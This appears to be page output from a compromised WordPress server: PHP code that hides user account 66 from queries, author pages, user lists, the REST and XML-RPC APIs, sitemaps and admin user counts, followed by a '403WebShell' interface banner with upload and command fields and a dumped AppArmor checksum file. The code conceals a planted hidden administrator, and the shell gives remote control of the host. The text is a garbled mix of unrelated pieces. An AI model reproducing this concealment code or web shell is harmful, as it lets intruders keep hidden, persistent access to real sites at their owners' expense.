add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/apparmor.md5sums
77505efda60d92698c333a40cbb87967  lib/apparmor/apparmor.systemd
0c68bdc6aaf3af6d880ba63cbbe23345  lib/apparmor/profile-load
45778f2ff8018bbb3119a7ffcae587d8  lib/apparmor/rc.apparmor.functions
a4dc69f441e262f5990179eccc72c4df  sbin/apparmor_parser
1888126ccd663449e512d597f4493529  usr/bin/aa-enabled
c8c6b512b0677f9c38bce62070c998da  usr/bin/aa-exec
f314e47eaaaa4f82f0e9b4f5a9c716fd  usr/bin/aa-features-abi
dd42e6f62c6332f971c954c9b65349ea  usr/lib/sysctl.d/10-apparmor.conf
7ccf904c1053c7829ac3864c50365efd  usr/lib/systemd/system/apparmor.service
e6ef4c59e759d46a56d29539add83062  usr/sbin/aa-load
158d57e153b2c9ee86091abab204e28d  usr/sbin/aa-remove-unknown
01fab0cbd8f305d935a60b5fed19993f  usr/sbin/aa-status
ee6e36ff52d807cde5f5a843c84d39cb  usr/sbin/aa-teardown
d8cf5a755408720349f02c9d7d7c955b  usr/share/apport/package-hooks/source_apparmor.py
7b652ab7419c5a64e7bbb4f643e8e2a7  usr/share/doc/apparmor/README.Debian
b8de91ec39de782fd225fe919b2b5f94  usr/share/doc/apparmor/changelog.Debian.gz
e58eba82d7b41d67c31eb4987d1d7376  usr/share/doc/apparmor/copyright
72f3660a559177a321b7b0702ff4d59a  usr/share/lintian/overrides/apparmor
98ef31ce1eb47b5ccb3c08671741f75c  usr/share/man/man1/aa-enabled.1.gz
0617ddcf1f860ff4a374b05b137eb502  usr/share/man/man1/aa-exec.1.gz
e449788dbc0589cd52612f84b7799d8b  usr/share/man/man1/aa-features-abi.1.gz
8a6c6f2ce6cf529e2c2cd847356d2c6f  usr/share/man/man5/apparmor.d.5.gz
bbd436839383033d1afe53a5a4ecfce9  usr/share/man/man5/apparmor.vim.5.gz
9c7885056cd643da308616bec4a09019  usr/share/man/man7/apparmor.7.gz
94740f0ac17eba6bb66edc5d8e78dbdd  usr/share/man/man7/apparmor_xattrs.7.gz
e930885649759dcf21b0538b2a000820  usr/share/man/man8/aa-remove-unknown.8.gz
8a7a19ad69d3b68641167b2e00157f6b  usr/share/man/man8/aa-status.8.gz
4e15d1169b32cf34c20fa0f7b1cd6989  usr/share/man/man8/aa-teardown.8.gz
f20629f91d567b55f0667cda1a05290b  usr/share/man/man8/apparmor_parser.8.gz
8a7a19ad69d3b68641167b2e00157f6b  usr/share/man/man8/apparmor_status.8.gz
930a3aa4475c57ce1db044e5ac76d12e  usr/share/session-migration/scripts/nautilus_thumbnail_cache_clear.sh

Youez - 2016 - github.com/yon3zu
LinuXploit